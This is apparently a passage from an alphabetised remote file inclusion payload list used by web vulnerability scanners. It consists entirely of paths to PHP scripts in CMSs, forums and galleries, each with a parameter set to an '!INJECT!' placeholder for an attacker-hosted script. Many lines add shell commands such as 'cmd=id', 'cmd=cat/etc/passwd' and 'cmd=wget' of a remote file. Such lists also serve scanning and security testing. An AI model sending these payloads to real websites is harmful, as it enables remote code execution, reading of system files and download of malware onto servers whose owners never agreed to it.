/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
/components/com_guestbook.php?absolute_path=!INJECT!?
/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
/components/com_minibb.php?absolute_path=!INJECT!
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
/components/core/connect.php?language_path=!INJECT!
/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
/components/minibb/index.php?absolute_path=!INJECT!?
/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/compteur/mapage.php?chemin=!INJECT!
/conf.php?securelib=!INJECT!
/conf.php?securelib=!INJECT!?
/config.inc.php3?rel_path=!INJECT!
/config.inc.php?_path=!INJECT!
/config.inc.php?path_escape=!INJECT!
/config.inc.php?path_escape=!INJECT!%00
/config.php?full_path=!INJECT!?
/config.php?full_path_to_db=!INJECT!
/config.php?fullpath=!INJECT!
/config.php?incpath=!INJECT!
/config.php?path_to_root=!INJECT!
/config.php?rel_path=!INJECT!?
/config.php?returnpath=!INJECT!
/config.php?sql_language=!INJECT!?
/config.php?xcart_dir=!INJECT!?
/config/config_admin.php?INC=!INJECT!?
/config/config_main.php?INC=!INJECT!?
/config/config_member.php?INC=!INJECT!?
/config/dbutil.bck.php?confdir=!INJECT!
/config/mysql_config.php?INC=!INJECT!?
/config/sender.php?ROOT_PATH=!INJECT!?
/configuration.php?absolute_path=!INJECT!?
/confirmUnsubscription.php?output=!INJECT!
/connect.php?path=!INJECT!
/connexion.php?DOCUMENT_ROOT=!INJECT!?
/contact.php?blog_theme=!INJECT!
/contacts.php?cal_dir=!INJECT!
/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
/content.php?content=!INJECT!
/content/admin.php?pwfile=!INJECT!
/content/content.php?fileloc=!INJECT!?
/content/delete.php?pwfile=!INJECT!
/content/modify.php?pwfile=!INJECT!
/content/modify_go.php?pwfile=!INJECT!
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
/controllers/MySQLController.php?baseDir=!INJECT!
/controllers/SQLController.php?baseDir=!INJECT!
/controllers/SetupController.php?baseDir=!INJECT!
/controllers/VideoController.php?baseDir=!INJECT!
/controllers/ViewController.php?baseDir=!INJECT!
/convert-date.php?cal_dir=!INJECT!
/convert/mvcw.php?step=1&vwar_root=!INJECT!
/convert/mvcw.php?vwar_root=!INJECT!
/core/admin/admin.php?p=admin&absoluteurl!INJECT!
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
/core/admin/categories_add.php?absoluteurl!INJECT!
/core/admin/categories_remove.php?absoluteurl!INJECT!
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
/core/admin/login.php?absoluteurl!INJECT!
/core/admin/pgRSSnews.php?absoluteurl!INJECT!
/core/admin/showcat.php?absoluteurl!INJECT!
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
/core/archive_cat.php?absoluteurl!INJECT!
/core/archive_nocat.php?absoluteurl!INJECT!
/core/aural.php?site_absolute_path=!INJECT!
/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
/core/editor.php?editor_insert_bottom=!INJECT!
/core/includes.php?CMS_ROOT=!INJECT!?
/core/recent_list.php?absoluteurl!INJECT!
/corpo.php?pagina=!INJECT!
/cp2.php?securelib=!INJECT!?
/cpe/index.php?repertoire_config=!INJECT!
/crea.php?plancia=!INJECT!
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
/creat_news_all.php?language=!INJECT!
/create_file.php?target=!INJECT!?
/cron.php?ROOT_PATH=!INJECT!
/cron.php?include_path=!INJECT!?
/crontab/run_billing.php?config[include_dir]=!INJECT!?
/cross.php?url=!INJECT!
/custom_vars.php?sys[path_addon]=!INJECT!
/customer/product.php?xcart_dir=!INJECT!
/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
/datei.php?config[root_ordner]=!INJECT!?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
/debugger.php?config_atkroot=!INJECT!
/decoder/gallery.php?ccms_library_path=!INJECT!
/decoder/markdown.php?ccms_library_path=!INJECT!
/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
/defines.php?WEBCHATPATH=!INJECT!?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
/depouilg.php3?NomVote=!INJECT!?
/development.php?root_prefix=!INJECT!?
/dfcode.php?DFORUM_PATH=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
/digitaleye_Path/module.php?menu=!INJECT!?
/dir/prepend.php?_PX_config[manager_path]=!INJECT!
/dir_thatware/config.php?root_path=!INJECT!'
/direct.php?rf=!INJECT!
/direction/index.php?repertoire_config=!INJECT!
/directory/index.php?path=!INJECT!
/display.php?pag=!INJECT!
/display.php?path=!INJECT!
/displayCategory.php?basepath=!INJECT!
/dix.php3?url_phpartenaire=!INJECT!
/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/doc/admin/index.php?ptinclude=!INJECT!
/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
/docs/front-end-demo/cart2.php?workdir=!INJECT!?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
/dosearch.php?RESPATH=!INJECT!
/download.php?root_prefix=!INJECT!?
/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
/downstat1.8/chart.php?art=!INJECT!?
/dp_logs.php?HomeDir=!INJECT!
/eXPerience2/modules.php?file=!INJECT!
/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=!INJECT!?
/editor.php?newsfile=!INJECT!
/editprofile.php?pathtohomedir=!INJECT!?
/editsite.php?returnpath=!INJECT!
/editx/add_address.php?include_dir=!INJECT!
/elseif/contenus.php?contenus=!INJECT!
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
/email_subscribe.php?root_prefix=!INJECT!?
/embed/day.php?path=!INJECT!
/enc/content.php?Home_Path=!INJECT!?
/engine/Ajax/editnews.php?root_dir=!INJECT!
/engine/api/api.class.php?dle_config_api=!INJECT!?
/engine/engine.inc.php?absolute_path=!INJECT!
/engine/init.php?root_dir=!INJECT!
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
/enth3/show_joined.php?path=!INJECT!
/environment.php?DIR_PREFIX=!INJECT!
/epal/index.php?view=!INJECT!?
/errors.php?error=!INJECT!
/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
/es_custom_menu.php?files_dir=!INJECT!
/es_desp.php?files_dir=!INJECT!
/es_offer.php?files_dir=!INJECT!
/eshow.php?Config_rootdir=!INJECT!
/esupport/admin/autoclose.php?subd=!INJECT!?
/eva/index.php3?aide=!INJECT!?
/eva/index.php3?perso=!INJECT!
/eva/index.php?eva[caminho]=!INJECT!
/event.php?myevent_path=!INJECT!
/event_cal/module/embed/day.php?path=!INJECT!
/eventcal2.php.php?path_simpnews=!INJECT!
/eventscroller.php?path_simpnews=!INJECT!
/example-view/templates/article.php?globals[content_dir]=!INJECT!?
/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
/example-view/templates/root.php?globals[content_dir]=!INJECT!?
/example.php?site=!INJECT!
/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
/examplefile.php?bibtexrootrel=!INJECT!?
/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
/extras/mt.php?web_root=!INJECT!
/extras/poll/poll.php?file_newsportal=!INJECT!
/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
/faq.php?module_root_path=!INJECT!
/faq.php?phpbb_root_path=!INJECT!
/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
/fcring.php?s_fuss=!INJECT!
/feed.php?config[root_ordner]=!INJECT!?&cmd=id
/feed/index2.php?m=!INJECT!
/files/amazon-bestsellers.php?CarpPath=!INJECT!
/files/carprss.php?CarpPath=!INJECT!
/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
/files/compose-new.php3?BSX_LIBDIR=!INJECT!
/files/compose-send.php3?BSX_LIBDIR=!INJECT!
/files/folder-create.php3?BSX_LIBDIR=!INJECT!
/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
/files/folders.php3?BSX_LIBDIR=!INJECT!
/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
/files/message-delete.php3?BSX_LIBDIR=!INJECT!
/files/message-forward.php3?BSX_LIBDIR=!INJECT!
/files/message-header.php3?BSX_LIBDIR=!INJECT!
/files/message-print.php3?BSX_LIBDIR=!INJECT!
/files/message-read.php3?BSX_LIBDIR=!INJECT!
/files/message-reply.php3?BSX_LIBDIR=!INJECT!
/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
/files/message-search.php3?BSX_LIBDIR=!INJECT!
/findix/index.php?page=!INJECT!?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
/fonctions/template.php?repphp=!INJECT!?
/fonctions_racine.php?chemin_lib=!INJECT!
/footer.inc.php?settings[footer]=!INJECT!
/footer.inc.php?tfooter=!INJECT!?
/footer.php?footer_file=!INJECT!
/footer.php?op[footer_body]=!INJECT!?
/form.php?path=!INJECT!?&cmd=pwd
/forum.php?cfg_file=1&fpath=!INJECT!?
/forum/forum.php?view=!INJECT!
/forum/forum82lib.php3?repertorylevel=!INJECT!?
/forum/gesfil.php?repertorylevel=!INJECT!?
/forum/lostpassword.php?repertorylevel=!INJECT!?
/forum/mail.php?repertorylevel=!INJECT!?
/forum/member.php?repertorylevel=!INJECT!?
/forum/message.php?repertorylevel=!INJECT!?
/forum/search.php?repertorylevel=!INJECT!?
/forum/track.php?path=!INJECT!
/frame.php?framefile=!INJECT!
/ftp.php?path_local=!INJECT!
/function.inc.php?path=!INJECT!
/function.php?adminfolder=!INJECT!
/function.php?gbpfad=!INJECT!
/functions.php?include_path=!INJECT!
/functions.php?pmp_rel_path=!INJECT!
/functions.php?s[phppath]=!INJECT!
/functions.php?set_path=!INJECT!?
/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
/galerie.php?config[root_ordner]=!INJECT!?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
/gallery/lib/content.php?include=!INJECT!?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
/gallerypath/index.php?includepath=!INJECT!
/games.php?id=!INJECT!
/games.php?scoreid=!INJECT!
/gbook/includes/header.php?abspath=!INJECT!?
/gemini/page/forums/bottom.php?lang=!INJECT!?
/gen_m3u.php?phpbb_root_path=!INJECT!
/genepi.php?topdir=!INJECT!
/generate.php?ht_pfad=!INJECT!?
/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=!INJECT!?
/get_session_vars.php?path_to_smf=!INJECT!
/getpage.php?page=online&doc_path=!INJECT!
/global.php?abs_path=!INJECT!?
/gorum/dbproperty.php?appDirName=!INJECT!
/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
/gpb/include/gpb.inc.php?root_path=!INJECT!?
/graph.php?DOCUMENT_ROOT=!INJECT!?
/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
/handlers/page/show.php?sous_rep=!INJECT!
/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/header.inc.php?CssFile=!INJECT!
/header.php?path=!INJECT!
/header.php?wwwRoot=!INJECT!
/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/help/index.php?show=!INJECT!
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/helperfunction.php?includedir=!INJECT!
/hioxBannerRotate.php?hm=!INJECT!
/hioxRandomAd.php?hm=!INJECT!
/hioxstats.php?hm=!INJECT!
/hioxupdate.php?hm=!INJECT!
/home.php?a=!INJECT!
/home.php?page=!INJECT!
/home.php?pagina=!INJECT!
/home/www/images/doc/index2.php?type=!INJECT!
/home1.php?ln=!INJECT!
/home2.php?ln=!INJECT!
/hsList.php?subdir=!INJECT!?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
/i_head.php?home=!INJECT!
/i_nav.php?home=!INJECT!
/iframe.php?file=!INJECT!
/image.php?url=!INJECT!???
/impex/ImpExData.php?systempath=!INJECT!
/import.php?bibtexrootrel=!INJECT!?
/importinfo.php?bibtexrootrel=!INJECT!?
/in.php?returnpath=!INJECT!
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
/inc/config.inc.php?x[1]=!INJECT!
/inc/design.inc.php?dir[data]=!INJECT!
/inc/download_center_lite.inc.php?script_root=!INJECT!
/inc/formmail.inc.php?script_root=!INJECT!
/inc/gabarits.php?cfg_racine=!INJECT!
/inc/header.inc.php?ficStyle=!INJECT!
/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
/inc/inc.php?cfg_racine=!INJECT!?
/inc/indexhead.php?fileloc=!INJECT!?
/inc/irayofuncs.php?irayodirhack=!INJECT!?
/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
/inc/linkbar.php?cfile=!INJECT!?
/inc/login.php?pathCGX=!INJECT!
/inc/logingecon.php?pathCGX=!INJECT!
/inc/ltdialogo.php?pathCGX=!INJECT!
/inc/mtdialogo.php?pathCGX=!INJECT!
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
/inc/prepend.inc.php?path=!INJECT!?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
/inc/settings.php?inc_dir=!INJECT!
/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
/inc/shows.inc.php?cutepath=!INJECT!?
/inc/sige_init.php?SYS_PATH=!INJECT!?
/inc_group.php?include_path=!INJECT!?
/inc_manager.php?include_path=!INJECT!?
/inc_newgroup.php.php?include_path=!INJECT!?
/inc_smb_conf.php?include_path=!INJECT!?
/inc_user.php?include_path=!INJECT!?
/include.php?_APP_RELATIVE_PATH=!INJECT!
/include.php?gorumDir=!INJECT!
/include.php?myng_root=!INJECT!
/include.php?path=psp/user.php&site=!INJECT!
/include.php?path[docroot]=!INJECT!
/include.php?sunPath=!INJECT!
/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!?
/include/SQuery/gameSpy2.php?libpath=!INJECT!
/include/bbs.lib.inc.php?site_path=!INJECT!
/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
/include/classes.php?INCLUDE_DIR=!INJECT!?
/include/client.php?INCLUDE_DIR=!INJECT!?
/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
/include/common.php?XOOPS_ROOT_PATH=!INJECT!
/include/common_functions.php?baros_path=!INJECT!?
/include/config.inc.php?racine=!INJECT!
/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
/include/customize.php?l=!INJECT!&text=Hello%20World
/include/default_header.php?script_path=!INJECT!
/include/define.php?INC_DIR=!INJECT!?
/include/disp_form.php3?cfg_include_dir=!INJECT!?
/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
/include/dom.php?path=!INJECT!
/include/dtd.php?path=!INJECT!
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
/include/forms.php?INCLUDE_DIR=!INJECT!?
/include/global.php?pfad=!INJECT!
/include/header.php?cs_base_path=!INJECT!?
/include/html/nettools.popup.php?DIR=!INJECT!
/include/inc.foot.php?root=!INJECT!
/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
/include/inc_freigabe.php?include_path=!INJECT!?
/include/inc_freigabe1.php?include_path=!INJECT!?
/include/inc_freigabe3.php?include_path=!INJECT!?
/include/include_stream.inc.php?include_path=!INJECT!
/include/include_top.php?g_include=!INJECT!
/include/includes.php?include_path=!INJECT!
/include/index.php3?cfg_include_dir=!INJECT!?
/include/init.inc.php?G_PATH=!INJECT!
/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
/include/lib/lib_slots.php?main_path=!INJECT!
/include/lib/lib_stats.php?main_path=!INJECT!?
/include/lib/lib_users.php?main_path=!INJECT!?
/include/little_news.php3?cfg_include_dir=!INJECT!?
/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
/include/loading.php?path_include=!INJECT!
/include/mail.inc.php?root=!INJECT!
/include/menu_builder.php?config[page_dir]=!INJECT!?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
/include/parser.php?path=!INJECT!
/include/pear/IT.php?basepath=!INJECT!?
/include/pear/ITX.php?basepath=!INJECT!?
/include/pear/IT_Error.php?basepath=!INJECT!?
/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
/include/prodler.class.php?sPath=!INJECT!???
/include/scripts/export_batch.inc.php?DIR=!INJECT!
/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
/include/scripts/send_email_cache.php?DIR=!INJECT!
/include/startup.inc.php?root_path=!INJECT!?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
/include/timesheet.php?config[include_dir]=!INJECT!
/include/urights.php?CRM_inc=!INJECT!
/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
/includes/ajax_listado.php?urlModulo=!INJECT!
/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
/includes/begin.inc.php?PagePrefix=!INJECT!
/includes/blogger.php?path_prefix=!INJECT!
/includes/class/class_tpl.php?cache_file=!INJECT!?
/includes/class_template.php?quezza_root_path=!INJECT!
/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
/includes/common.php?module_root_path=!INJECT!?
/includes/common.php?root=!INJECT!?
/includes/common.php?root_path=!INJECT!?
/includes/config.inc.php?racineTBS=!INJECT!
/includes/config/master.inc.php?fm_data[root]=!INJECT!?
/includes/connection.inc.php?PagePrefix=!INJECT!
/includes/dbal.php?eqdkp_root_path=!INJECT!
/includes/events.inc.php?PagePrefix=!INJECT!
/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
/includes/footer.inc.php?PagePrefix=!INJECT!
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
/includes/functions.inc.php?sitepath=!INJECT!?
/includes/functions.php?location=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!?
/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/includes/functions/html_generate.php?path_prefix=!INJECT!
/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
/includes/functions/validations.php?path_prefix=!INJECT!
/includes/functions_admin.php?phpbb_root_path=!INJECT!?
/includes/functions_install.php?vwar_root=!INJECT!
/includes/functions_kb.php?phpbb_root_path=!INJECT!?
/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
/includes/functions_portal.php?phpbb_root_path=!INJECT!?
/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
/includes/global.php?nbs=!INJECT!?
/includes/header.inc.php?PagePrefix=!INJECT!
/includes/header.inc.php?dateiPfad=!INJECT!
/includes/include_once.php?include_file=!INJECT!
/includes/init.php?includepath=!INJECT!?
/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
/includes/kb_constants.php?module_root_path=!INJECT!
/includes/lang/language.php?path_to_root=!INJECT!
/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/logger_engine.php?phpbb_root_path=!INJECT!
/includes/menuleft.inc.php?PagePrefix=!INJECT!
/includes/mkb.php?phpbb_root_path=!INJECT!?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
/includes/mx_common.php?module_root_path=!INJECT!?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
/includes/pafiledb_constants.php?module_root_path=!INJECT!
/includes/pages.inc.php?PagePrefix=!INJECT!
/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
/includes/profilcp_constants.php?module_root_path=!INJECT!?
/includes/settings.inc.php?approot=!INJECT!
/includes/template.php?myevent_path=!INJECT!
/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
/includes/tumbnail.php?config[root_ordner]=!INJECT!?
/includes/usercp_register.php?phpbb_root_path=!INJECT!?
/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
/includes/xhtml.php?d_root=!INJECT!?
/index.php3?Application_Root=!INJECT!
/index.php?1=lol&PAGES[lol]=!INJECT!
/index.php?AML_opensite=!INJECT!
/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/index.php?ConfigDir=!INJECT!
/index.php?DIR_PLUGINS=!INJECT!
/index.php?G_JGALL[inc_path]=!INJECT!%00
/index.php?HomeDir=!INJECT!
/index.php?Lang=AR&Page=!INJECT!
/index.php?Madoa=!INJECT!?
/index.php?RP_PATH=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?abg_path=!INJECT!?
/index.php?abs_path=!INJECT!?
/index.php?adduser=true&lang=!INJECT!
/index.php?adodb=!INJECT!
/index.php?ads_file=!INJECT!
/index.php?arquivo=!INJECT!
/index.php?back=!INJECT!
/index.php?base==!INJECT!
/index.php?basePath=!INJECT!
/index.php?bibtexrootrel=!INJECT!?
/index.php?blog_dc_path=!INJECT!
